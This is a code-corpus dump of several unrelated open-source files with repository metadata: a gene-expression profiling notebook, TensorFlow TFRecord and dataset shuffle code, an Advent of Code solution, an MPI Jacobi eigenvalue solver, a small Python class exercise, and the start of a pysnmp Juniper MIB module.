# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# %% [markdown] tags=[]
# # Description
# %% [markdown] tags=[]
# It profiles some functions to compute the correlation between predicted gene expression. Each of these notebooks is supposed to be run in a particular changeset.
#
# **Before running this notebook**, make sure you are in this changeset:
# ```bash
# # the changes tried to improve the performance by activating lru_cache for method Gene._get_ssm_correlation
# git co fd3d476f0f4e53b8b8dfbe395dcf498c09b03aaf
# ```
# %%
# %load_ext line_profiler
# %% [markdown] tags=[]
# # Modules
# %% tags=[]
from entity import Gene
# %% [markdown]
# # Functions
# %%
def compute_ssm_correlation(all_genes):
res = []
for g1_idx, g1 in enumerate(all_genes[:-1]):
for g2 in all_genes[g1_idx:]:
c = g1.get_ssm_correlation(
g2,
reference_panel="1000G",
model_type="MASHR",
use_within_distance=False,
)
res.append(c)
return res
# %% [markdown]
# # Test case
# %%
gene1 = Gene(ensembl_id="ENSG00000180596")
gene2 = Gene(ensembl_id="ENSG00000180573")
gene3 = Gene(ensembl_id="ENSG00000274641")
gene4 = Gene(ensembl_id="ENSG00000277224")
all_genes = [gene1, gene2, gene3, gene4]
# %%
assert len(set([g.chromosome for g in all_genes])) == 1
# %% [markdown]
# # Run timeit
# %%
# %timeit compute_ssm_correlation(all_genes)
# %% [markdown]
# # Profile
# %%
# %prun -l 20 -s cumulative compute_ssm_correlation(all_genes)
# %%
# %prun -l 20 -s time compute_ssm_correlation(all_genes)
# %%
| [
"[email protected]"
] | |
09b56da17b552a715728664e0d4b355d51787a27 | 179140ef3ac111af7645636b5408894a3b61094f | /camera_trap_classifier/data/tfr_encoder_decoder.py | 2cf32feeda4cd2d78f8897e135b88d0269e7e2f9 | [
"MIT"
] | permissive | YunyiShen/camera-trap-classifier | 1d9bc3431ed31a00edfcd8fa4323fcf110ecc514 | 95f5f2db1c61f401e2408b8a9bfb6c069fa1a98e | refs/heads/master | 2020-12-04T06:42:24.552725 | 2020-01-03T23:01:44 | 2020-01-03T23:01:44 | 231,662,686 | 0 | 0 | MIT | 2020-01-03T20:47:03 | 2020-01-03T20:47:02 | null | UTF-8 | Python | false | false | 7,590 | py | """ Class To Encode and Decode TFRecords"""
import logging
import tensorflow as tf
from camera_trap_classifier.data.utils import (
wrap_int64, wrap_bytes, wrap_dict_bytes_list, wrap_dict_int64_list,
_bytes_feature_list,
_bytes_feature_list_str)
from camera_trap_classifier.data.image import decode_image_bytes_1D
logger = logging.getLogger(__name__)
class TFRecordEncoderDecoder(object):
""" Define Encoder and Decoder for a specific TFRecord file """
def __init__(self):
logger.info("Initializing TFRecordEncoderDecoder")
def encode_record(self, record_data):
raise NotImplementedError
def decode_record(self):
raise NotImplementedError
class DefaultTFRecordEncoderDecoder(TFRecordEncoderDecoder):
""" Default TFREncoder / Decoder """
def _convert_to_tfr_data_format(self, record):
""" Convert a record to a tfr format """
id = record['id']
n_images = record['n_images']
n_labels = record['n_labels']
image_paths = record['image_paths']
meta_data = record['meta_data']
label_text = record['labelstext']
labels = {k: v for k, v in record.items() if 'label/' in k}
labels_num = {k: v for k, v in record.items() if 'label_num/' in k}
label_features = wrap_dict_bytes_list(labels)
label_num_features = wrap_dict_int64_list(labels_num)
tfr_data = {
"id": wrap_bytes(tf.compat.as_bytes(id)),
"n_images": wrap_int64(n_images),
"n_labels": wrap_int64(n_labels),
"image_paths": _bytes_feature_list_str(image_paths),
"meta_data": wrap_bytes(tf.compat.as_bytes(meta_data)),
"labelstext": wrap_bytes(tf.compat.as_bytes(label_text)),
"images": _bytes_feature_list(record['images']),
**label_features,
**label_num_features
}
return tfr_data
def encode_record(self, record_data):
""" Encode Record to Serialized String """
tfr_data_dict = self._convert_to_tfr_data_format(record_data)
feature_attributes = set(['id', 'n_images', 'n_labels',
'meta_data', 'labelstext'])
feature_list_attributes = tfr_data_dict.keys() - feature_attributes
# Wrap the data as TensorFlow Features
feature_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_attributes}
feature = tf.train.Features(feature=feature_dict)
# Wrap lists as FeatureLists
feature_list_dict = {k: v for k, v in tfr_data_dict.items()
if k in feature_list_attributes}
feature_lists = tf.train.FeatureLists(feature_list=feature_list_dict)
# Wrap again as a TensorFlow Example.
example = tf.train.SequenceExample(
context=feature,
feature_lists=feature_lists)
# Serialize the data.
serialized = example.SerializeToString()
return serialized
def decode_record(self, serialized_example,
output_labels,
label_lookup_dict=None,
image_pre_processing_fun=None,
image_pre_processing_args=None,
image_choice_for_sets='random',
decode_images=True,
numeric_labels=False,
return_only_ml_data=True,
only_return_one_label=True
):
""" Decode TFRecord and return dictionary """
# fixed size Features - ID and labels
if return_only_ml_data:
context_features = {
'id': tf.FixedLenFeature([], tf.string)
}
else:
context_features = {
'id': tf.FixedLenFeature([], tf.string),
'n_images': tf.FixedLenFeature([], tf.int64),
'n_labels': tf.FixedLenFeature([], tf.int64),
'meta_data': tf.FixedLenFeature([], tf.string),
'labelstext': tf.FixedLenFeature([], tf.string)
}
# Extract labels (string and numeric)
label_names = ['label/' + l for l in output_labels]
label_features = {k: tf.FixedLenSequenceFeature([], tf.string)
for k in label_names}
label_num_names = ['label_num/' + l for l in output_labels]
label_num_features = {k: tf.FixedLenSequenceFeature([], tf.int64)
for k in label_num_names}
if return_only_ml_data:
if numeric_labels:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_num_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
**label_features
}
else:
sequence_features = {
'images': tf.FixedLenSequenceFeature([], tf.string),
'image_paths': tf.FixedLenSequenceFeature([], tf.string),
**label_features,
**label_num_features
}
# Parse the serialized data so we get a dict with our data.
context, sequence = tf.parse_single_sequence_example(
serialized=serialized_example,
context_features=context_features,
sequence_features=sequence_features)
# determine label prefix for either numeric or string labels
if numeric_labels:
label_prefix = 'label_num/'
else:
label_prefix = 'label/'
# Wheter to return only the labels of the first observation or all
# and wheter to map string labels to integers using a lookup table
if only_return_one_label:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: tf.reshape(label_lookup_dict[k].lookup(v[0]), [1])
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v[0]
for k, v in sequence.items() if label_prefix in k}
else:
if label_lookup_dict is not None and not numeric_labels:
parsed_labels = {
k: label_lookup_dict[k].lookup(v)
for k, v in sequence.items() if label_prefix in k}
else:
parsed_labels = {
k: v
for k, v in sequence.items() if label_prefix in k}
if not decode_images:
return {**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k},
**parsed_labels}
# decode 1-D tensor of raw images
image = decode_image_bytes_1D(
sequence['images'],
**image_pre_processing_args)
# Pre-Process image
if image_pre_processing_fun is not None:
image_pre_processing_args['image'] = image
image = image_pre_processing_fun(**image_pre_processing_args)
return ({'images': image},
{**{k: v for k, v in context.items()},
**{k: v for k, v in sequence.items()
if label_prefix not in k and 'images' not in k},
**parsed_labels})
| [
"[email protected]"
] | |
93ee6822569c5b7e9169ffac1e02ef95e6d5c928 | 412b0612cf13e9e28b9ea2e625975f3d9a2f52b6 | /2017/18/double_computer.py | 15e82c468b7a8a9ed25058bcadfb08c381a40aa1 | [] | no_license | AlexClowes/advent_of_code | 2cf6c54a5f58db8482d1692a7753b96cd84b6279 | d2158e3a4edae89071e6a88c9e874a9a71d4d0ec | refs/heads/master | 2022-12-24T19:02:07.815437 | 2022-12-23T17:35:53 | 2022-12-23T17:35:53 | 225,618,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | from collections import defaultdict
import operator
from queue import Queue
def prog(program, program_id, snd_queue, rcv_queue):
registers = defaultdict(int)
registers["p"] = program_id
value = lambda x: registers[x] if x.isalpha() else int(x)
instruction_pointer = 0
while 0 <= instruction_pointer < len(program):
op, *args = program[instruction_pointer].split()
if op == "set":
registers[args[0]] = value(args[1])
elif op in ("add", "mul", "mod"):
func = getattr(operator, op)
registers[args[0]] = func(registers[args[0]], value(args[1]))
elif op == "jgz":
if value(args[0]) > 0:
instruction_pointer += value(args[1]) - 1
elif op == "snd":
snd_queue.put(value(args[0]))
yield True
elif op == "rcv":
if rcv_queue.empty():
instruction_pointer -= 1
yield False
else:
registers[args[0]] = rcv_queue.get()
instruction_pointer += 1
def count_sends_before_blocking(prog):
ret = 0
while next(prog):
ret += 1
return ret
def run(program):
q0, q1 = Queue(), Queue()
prog0 = prog(program, 0, q0, q1)
prog1 = prog(program, 1, q1, q0)
total = 0
while True:
prog0_sends = count_sends_before_blocking(prog0)
prog1_sends = count_sends_before_blocking(prog1)
total += prog1_sends
if prog0_sends == prog1_sends == 0:
return total
def main():
with open("program.txt") as f:
program = [line.strip() for line in f]
print(run(program))
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
eb27a95802962717549a291267adf4019d33615d | 5fdace6ee07fe9db58f026a4764629261203a173 | /tensorflow/python/data/kernel_tests/shuffle_test.py | ceca3e8d61f1fbf65c81ba3762f5e6d8fc7ad1cf | [
"Apache-2.0"
] | permissive | davidstone/tensorflow | 5ed20bb54659a1cb4320f777790a3e14551703d7 | 6044759779a564b3ecffe4cb60f28f20b8034add | refs/heads/master | 2022-04-28T02:19:53.694250 | 2020-04-24T17:41:08 | 2020-04-24T17:41:08 | 258,335,682 | 0 | 0 | Apache-2.0 | 2020-04-23T21:32:14 | 2020-04-23T21:32:13 | null | UTF-8 | Python | false | false | 14,239 | py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.shuffle()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
from absl.testing import parameterized
import numpy as np
from tensorflow.python import tf2
from tensorflow.python.compat import compat
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.eager import context
from tensorflow.python.eager import function
from tensorflow.python.framework import combinations
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class ShuffleTest(test_base.DatasetTestBase, parameterized.TestCase):
@combinations.generate(test_base.default_test_combinations())
def testBasic(self):
components = (
np.array([1, 2, 3, 4]), np.array([5, 6, 7, 8]),
np.array([9.0, 10.0, 11.0, 12.0])
)
def dataset_fn(count=5, buffer_size=None, seed=0):
repeat_dataset = (
dataset_ops.Dataset.from_tensor_slices(components).repeat(count))
if buffer_size:
shuffle_dataset = repeat_dataset.shuffle(buffer_size, seed)
self.assertEqual(
tuple([c.shape[1:] for c in components]),
dataset_ops.get_legacy_output_shapes(shuffle_dataset))
return shuffle_dataset
else:
return repeat_dataset
# First run without shuffling to collect the "ground truth".
get_next = self.getNext(dataset_fn())
unshuffled_elements = []
for _ in range(20):
unshuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# Assert that the shuffled dataset has the same elements as the
# "ground truth".
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
shuffled_elements = []
for _ in range(20):
shuffled_elements.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(sorted(unshuffled_elements), sorted(shuffled_elements))
# Assert that shuffling twice with the same seeds gives the same sequence.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=37))
reshuffled_elements_same_seed = []
for _ in range(20):
reshuffled_elements_same_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertEqual(shuffled_elements, reshuffled_elements_same_seed)
# Assert that shuffling twice with a different seed gives a different
# permutation of the same elements.
get_next = self.getNext(dataset_fn(buffer_size=100, seed=137))
reshuffled_elements_different_seed = []
for _ in range(20):
reshuffled_elements_different_seed.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertNotEqual(shuffled_elements, reshuffled_elements_different_seed)
self.assertAllEqual(
sorted(shuffled_elements), sorted(reshuffled_elements_different_seed))
# Assert that the shuffled dataset has the same elements as the
# "ground truth" when the buffer size is smaller than the input
# dataset.
get_next = self.getNext(dataset_fn(buffer_size=2, seed=37))
reshuffled_elements_small_buffer = []
for _ in range(20):
reshuffled_elements_small_buffer.append(self.evaluate(get_next()))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
self.assertAllEqual(
sorted(unshuffled_elements), sorted(reshuffled_elements_small_buffer))
# Test the case of shuffling an empty dataset.
get_next = self.getNext(dataset_fn(count=0, buffer_size=100, seed=37))
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
@combinations.generate(combinations.combine(tf_api_version=1, mode="graph"))
def testSeedZero(self):
"""Test for same behavior when the seed is a Python or Tensor zero."""
iterator = dataset_ops.make_one_shot_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=0))
get_next = iterator.get_next()
elems = []
with self.cached_session() as sess:
for _ in range(10):
elems.append(sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
seed_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = dataset_ops.make_initializable_iterator(
dataset_ops.Dataset.range(10).shuffle(10, seed=seed_placeholder))
get_next = iterator.get_next()
with self.cached_session() as sess:
sess.run(iterator.initializer, feed_dict={seed_placeholder: 0})
for elem in elems:
self.assertEqual(elem, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
@combinations.generate(test_base.default_test_combinations())
def testDefaultArguments(self):
components = [0, 1, 2, 3, 4]
dataset = dataset_ops.Dataset.from_tensor_slices(components).shuffle(
5).repeat()
get_next = self.getNext(dataset)
counts = collections.defaultdict(lambda: 0)
for _ in range(10):
for _ in range(5):
counts[self.evaluate(get_next())] += 1
for i in range(5):
self.assertEqual(10, counts[i])
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(reshuffle=[True, False]),
combinations.combine(graph_seed=38, op_seed=None) +
combinations.combine(graph_seed=None, op_seed=42) +
combinations.combine(graph_seed=38, op_seed=42)))
def testShuffleSeed(self, reshuffle, graph_seed, op_seed):
results = []
for _ in range(2):
with ops.Graph().as_default() as g:
random_seed.set_random_seed(graph_seed)
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=op_seed, reshuffle_each_iteration=reshuffle).repeat(3)
iterator = dataset_ops.make_one_shot_iterator(dataset)
next_element = iterator.get_next()
run_results = []
with self.session(graph=g) as sess:
for _ in range(30):
run_results.append(sess.run(next_element))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
results.append(run_results)
self.assertAllEqual(results[0], results[1])
# TODO(b/117581999): enable this test for eager-mode.
@combinations.generate(
combinations.times(
test_base.graph_only_combinations(),
combinations.combine(
reshuffle=[True, False], initializable=[True, False])))
def testMultipleIterators(self, reshuffle, initializable):
with ops.Graph().as_default() as g:
dataset = dataset_ops.Dataset.range(100).shuffle(
10, reshuffle_each_iteration=reshuffle).repeat(3)
if initializable:
iterators = [dataset_ops.make_initializable_iterator(dataset)
for _ in range(2)]
else:
iterators = [dataset_ops.make_one_shot_iterator(dataset)
for _ in range(2)]
results = []
with self.session(graph=g) as sess:
for iterator in iterators:
if initializable:
sess.run(iterator.initializer)
next_element = iterator.get_next()
run_results = []
for _ in range(300):
run_results.append(sess.run(next_element))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_element)
results.append(run_results)
self.assertNotEqual(results[0], results[1])
@combinations.generate(
combinations.times(
test_base.default_test_combinations(),
combinations.combine(reshuffle=[True, False], seed=[None, 42])))
def testReshuffleRepeatEpochs(self, reshuffle, seed):
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle).repeat(2)
next_element = self.getNext(dataset)
first_epoch = []
for _ in range(10):
first_epoch.append(self.evaluate(next_element()))
second_epoch = []
for _ in range(10):
second_epoch.append(self.evaluate(next_element()))
self.assertEqual(first_epoch == second_epoch, not reshuffle)
@combinations.generate(
combinations.times(
combinations.combine(tf_api_version=2, mode="eager"),
combinations.combine(reshuffle=[True, False], seed=[None, 42])))
def testReshuffleIterationEpochs(self, reshuffle, seed):
# TensorFlow unit tests set the global graph seed. We unset it here so that
# we can control determinism via the `seed` parameter.
random_seed.set_random_seed(None)
dataset = dataset_ops.Dataset.range(10).shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle)
first_epoch = self.getDatasetOutput(dataset)
second_epoch = self.getDatasetOutput(dataset)
self.assertEqual(first_epoch == second_epoch, not reshuffle)
@combinations.generate(combinations.combine(tf_api_version=2, mode="eager"))
def testShuffleV2ResourceCapture(self):
def make_dataset():
ids = dataset_ops.Dataset.range(10)
ids = ids.shuffle(1)
def interleave_fn(dataset, _):
return dataset
dataset = dataset_ops.Dataset.range(1)
dataset = dataset.interleave(functools.partial(interleave_fn, ids))
return dataset
results = []
for elem in make_dataset():
results.append(elem.numpy())
self.assertAllEqual(results, range(10))
@combinations.generate(
combinations.times(
test_base.eager_only_combinations(),
combinations.combine(reshuffle=[True, False], seed=[None, 42])))
def testReshuffleSeparateTransformations(self, reshuffle, seed):
dataset = dataset_ops.Dataset.range(10)
first_epoch = []
for elem in dataset.shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle):
first_epoch.append(elem.numpy())
second_epoch = []
for elem in dataset.shuffle(
10, seed=seed, reshuffle_each_iteration=reshuffle):
second_epoch.append(elem.numpy())
self.assertEqual(first_epoch != second_epoch, seed is None)
@combinations.generate(combinations.combine(tf_api_version=2, mode="eager"))
def testShuffleV2InFunction(self):
counter_var = variables.Variable(0)
@function.defun
def consume():
ds = dataset_ops.Dataset.range(10)
ds = ds.shuffle(1)
for _ in ds:
counter_var.assign(counter_var + 1)
consume()
self.assertAllEqual(self.evaluate(counter_var), 10)
@combinations.generate(test_base.default_test_combinations())
def testEmptyDataset(self):
dataset = dataset_ops.Dataset.from_tensors(1)
def map_fn(x):
with ops.control_dependencies([check_ops.assert_equal(x, 0)]):
return x
dataset = dataset.map(map_fn)
dataset = dataset.cache()
dataset = dataset.shuffle(buffer_size=10).repeat()
get_next = self.getNext(dataset)
# First time around, we get an error for the failed assertion.
with self.assertRaises(errors.InvalidArgumentError):
self.evaluate(get_next())
# Second time around, we get an EOF because the cached dataset is empty.
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# We skip v2 eager since the v2 eager shuffle dataset is not serializable due
# to its use of an external seed generator resource.
@combinations.generate(
combinations.times(
test_base.graph_only_combinations() +
combinations.combine(mode=["eager"]),
combinations.combine(reshuffle=[True, False])))
def testRerandomizeOnReplicate(self, reshuffle):
if tf2.enabled() and not compat.forward_compatible(2020, 5, 22):
self.skipTest("Functionality currently not supported.")
random_seed.set_random_seed(None)
# When no seeds are fixed, each instantiation of the shuffle dataset should
# produce elements in a different order.
num_elements = 100
dataset = dataset_ops.Dataset.range(num_elements)
dataset = dataset.shuffle(num_elements, reshuffle_each_iteration=reshuffle)
shuffle_1 = self.getDatasetOutput(dataset)
dataset = self.graphRoundTrip(dataset, allow_stateful=True)
shuffle_2 = self.getDatasetOutput(dataset)
self.assertCountEqual(shuffle_1, shuffle_2)
self.assertNotEqual(shuffle_1, shuffle_2)
@combinations.generate(test_base.default_test_combinations())
def testCoordinateShuffling(self):
if not compat.forward_compatible(
2020, 5, 22) and tf2.enabled() and context.executing_eagerly():
self.skipTest("Functionality currently not supported.")
num_elements = 100
ds = dataset_ops.Dataset.range(num_elements)
ds = ds.shuffle(num_elements, seed=42)
ds = dataset_ops.Dataset.zip((ds, ds))
get_next = self.getNext(ds)
for _ in range(100):
x, y = self.evaluate(get_next())
self.assertEqual(x, y)
if __name__ == "__main__":
test.main()
| [
"[email protected]"
] | |
08f3bcef3f8cd09135340a9e0b5b59eba23f21d6 | a6cba5b8b36f3f4ef80d7351725da0bc8ddbfad4 | /NM/cp/main.py | e362e92e7130e9ddfb28811f5a86ec2d6613187c | [] | no_license | tutkarma/mai_study | 7de61a406c7c5701ea9bbea7da687cc147653e53 | 39359eb8b5701c752d1f4e8e0b26911e50df12ab | refs/heads/master | 2023-03-15T18:28:05.814809 | 2022-01-18T08:40:39 | 2022-01-18T08:40:39 | 103,191,526 | 38 | 99 | null | 2023-03-04T02:20:21 | 2017-09-11T21:46:56 | Jupyter Notebook | UTF-8 | Python | false | false | 5,366 | py | import argparse
import json
from utils import save_to_file
from mpi4py import MPI
import numpy as np
def read_data(filename, need_args):
init_dict = {}
with open(filename, 'r') as json_data:
data = json.load(json_data)[0] # !
for arg in need_args:
if arg not in data:
raise ValueError('No "{0}" in given data'.format(arg))
if arg == 'matrix':
init_dict[arg] = np.array(data[arg], dtype=np.float64)
else:
init_dict[arg] = data[arg]
return init_dict
def sign(n):
return 1 if n > 0 else -1
def t(A):
return np.sqrt(sum([A[i, j] ** 2 for i in range(A.shape[0])
for j in range(i + 1, A.shape[0])]))
def indexes_max_elem(A):
i_max = j_max = 0
a_max = A[0, 0]
for i in range(A.shape[0]):
for j in range(i + 1, A.shape[0]):
if abs(A[i, j]) > a_max:
a_max = abs(A[i, j])
i_max, j_max = i, j
return i_max, j_max
def parallel_jacobi_rotate(comm, A, ind_j, ind_k):
sz = A.shape[0]
rank = comm.Get_rank()
pool_size = comm.Get_size()
c = s = 0.0
j = k = 0
row_j, row_k = np.zeros(sz), np.zeros(sz)
if rank == 0:
j, k = ind_j, ind_k
if A[j, j] == A[k, k]:
c = np.cos(np.pi / 4)
s = np.sin(np.pi / 4)
else:
tau = (A[j, j] - A[k, k]) / (2 * A[j, k])
t = sign(tau) / (abs(tau) + np.sqrt(1 + tau ** 2))
c = 1 / np.sqrt(1 + t ** 2)
s = c * t
for i in range(sz):
row_j[i] = A[j, i]
row_k[i] = A[k, i]
j = comm.bcast(j, root=0)
k = comm.bcast(k, root=0)
c = comm.bcast(c, root=0)
s = comm.bcast(s, root=0)
comm.Bcast(row_j, root=0)
comm.Bcast(row_k, root=0)
row_j_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 1]))
row_k_comm = comm.Create_group(comm.group.Incl([i for i in range(1, pool_size) if i % 2 == 0]))
row_j_rank = row_j_size = -1
row_j_new = np.zeros(sz)
if MPI.COMM_NULL != row_j_comm:
row_j_rank = row_j_comm.Get_rank()
row_j_size = row_j_comm.Get_size()
size = int(sz / row_j_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_j_new_part = np.zeros(size)
row_j_comm.Scatter(row_j, row_j_part, root=0)
row_j_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_j_new_part[i] = c * row_j_part[i] + s * row_k_part[i]
row_j_comm.Gather(row_j_new_part, row_j_new, root=0)
if row_j_rank == 0:
comm.Send([row_j_new, sz, MPI.FLOAT], dest=0, tag=0)
row_j_comm.Free()
row_k_rank = row_k_size = -1
row_k_new = np.zeros(sz)
if MPI.COMM_NULL != row_k_comm:
row_k_rank = row_k_comm.Get_rank()
row_k_size = row_k_comm.Get_size()
size = int(sz / row_k_size)
row_j_part = np.zeros(size)
row_k_part = np.zeros(size)
row_k_new_part = np.zeros(size)
row_k_comm.Scatter(row_j, row_j_part, root=0)
row_k_comm.Scatter(row_k, row_k_part, root=0)
for i in range(size):
row_k_new_part[i] = s * row_j_part[i] - c * row_k_part[i]
row_k_comm.Gather(row_k_new_part, row_k_new, root=0)
if row_k_rank == 0:
comm.Send([row_k_new, sz, MPI.FLOAT], dest=0, tag=0)
row_k_comm.Free()
if rank == 0:
status = MPI.Status()
comm.Recv([row_j_new, sz, MPI.FLOAT], source=1, tag=0, status=status)
comm.Recv([row_k_new, sz, MPI.FLOAT], source=2, tag=0, status=status)
A[j, k] = A[k, j] = (c ** 2 - s ** 2) * row_j[k] + s * c * (row_k[k] - row_j[j])
A[j, j] = c ** 2 * row_j[j] + 2 * s * c * row_j[k] + s ** 2 * row_k[k]
A[k, k] = s ** 2 * row_j[j] - 2 * s * c * row_j[k] + c ** 2 * row_k[k]
for i in range(sz):
if i != j and i != k:
A[j, i] = A[i, j] = row_j_new[i]
A[k, i] = A[i, k] = row_k_new[i]
return A
def jacobi_parallel(comm, A, eps):
elapsed_time = 0
i, j = indexes_max_elem(A)
norm = t(A)
rank = comm.Get_rank()
eps = comm.bcast(eps, root=0)
norm = comm.bcast(norm, root=0)
k = 1
while norm > eps:
elapsed_time -= MPI.Wtime()
A = parallel_jacobi_rotate(comm, A, j, i)
if rank == 0:
norm = t(A)
elapsed_time += MPI.Wtime()
norm = comm.bcast(norm, root=0)
i, j = indexes_max_elem(A)
k += 1
return np.diag(A).tolist()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True, help='Input file')
parser.add_argument('--output', required=True, help='Output file')
args = parser.parse_args()
elapsed_time = 0
need_args = ('matrix', 'eps')
init_dict = read_data(args.input, need_args)
A, eps = init_dict['matrix'], init_dict['eps']
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
elapsed_time -= MPI.Wtime()
eig = jacobi_parallel(comm, A, eps)
elapsed_time += MPI.Wtime()
if rank == 0:
save_to_file(args.output, eigenvalues=eig)
print("Dimension {0}, time elapsed {1} sec.\n".format(A.shape[0], elapsed_time))
MPI.Finalize() | [
"[email protected]"
] | |
575d02aa9fb79160437e642f6d8501b4b1d3b89c | 0f556b9d4e250df73bf1e0929dbd4afad51e82fe | /person/3/person.py | 18a8f9d43f414810584c840c8d787016b5ca9207 | [] | no_license | unabl4/PythonCodeClub | 0ef1cb4d145860a4fda528c2eea513d0ba6b8327 | 72d5887342c1e0b304307a0e0ac9eb78f0202c35 | refs/heads/master | 2021-04-30T04:42:03.266029 | 2019-02-18T22:09:12 | 2019-02-18T22:09:12 | 121,541,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 604 | py | from datetime import date
class Person:
def __init__(self, first_name, last_name, birth_date):
self.first_name = first_name
self.last_name = last_name
self.birth_date = birth_date
def age(self):
return int((date.today()-self.birth_date).days // 365.25)
def full_name(self):
return "%s %s" % (self.first_name, self.last_name)
# ---
class Female(Person):
def __init__(self, first_name, last_name, birth_date):
super().__init__(first_name, last_name, birth_date)
def age(self):
age = super().age()
return min(20, age)
| [
"[email protected]"
] | |
97e989546fc1cd3b939a0e6230c20cd0361c5a99 | 85a9ffeccb64f6159adbd164ff98edf4ac315e33 | /pysnmp-with-texts/Juniper-SONET-CONF.py | c3b8be3cccc5ea7d781b518f90c1487395270edc | [
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | agustinhenze/mibs.snmplabs.com | 5d7d5d4da84424c5f5a1ed2752f5043ae00019fb | 1fc5c07860542b89212f4c8ab807057d9a9206c7 | refs/heads/master | 2020-12-26T12:41:41.132395 | 2019-08-16T15:51:41 | 2019-08-16T15:53:57 | 237,512,469 | 0 | 0 | Apache-2.0 | 2020-01-31T20:41:36 | 2020-01-31T20:41:35 | null | UTF-8 | Python | false | false | 11,118 | py | #
# PySNMP MIB module Juniper-SONET-CONF (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/Juniper-SONET-CONF
# Produced by pysmi-0.3.4 at Wed May 1 14:04:23 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueRangeConstraint, ConstraintsUnion, ValueSizeConstraint, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueRangeConstraint", "ConstraintsUnion", "ValueSizeConstraint", "SingleValueConstraint")
juniAgents, = mibBuilder.importSymbols("Juniper-Agents", "juniAgents")
AgentCapabilities, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "AgentCapabilities", "ModuleCompliance", "NotificationGroup")
iso, MibScalar, MibTable, MibTableRow, MibTableColumn, Integer32, Counter32, ObjectIdentity, Counter64, IpAddress, Bits, Unsigned32, Gauge32, TimeTicks, NotificationType, ModuleIdentity, MibIdentifier = mibBuilder.importSymbols("SNMPv2-SMI", "iso", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "Integer32", "Counter32", "ObjectIdentity", "Counter64", "IpAddress", "Bits", "Unsigned32", "Gauge32", "TimeTicks", "NotificationType", "ModuleIdentity", "MibIdentifier")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
juniSonetAgent = ModuleIdentity((1, 3, 6, 1, 4, 1, 4874, 5, 2, 40))
juniSonetAgent.setRevisions(('2005-09-15 20:26', '2003-07-16 17:22', '2003-01-31 20:09', '2002-04-09 23:44', '2002-02-04 21:35', '2001-04-03 22:35',))
if getattr(mibBuilder, 'version', (0, 0, 0)) > (4, 4, 0):
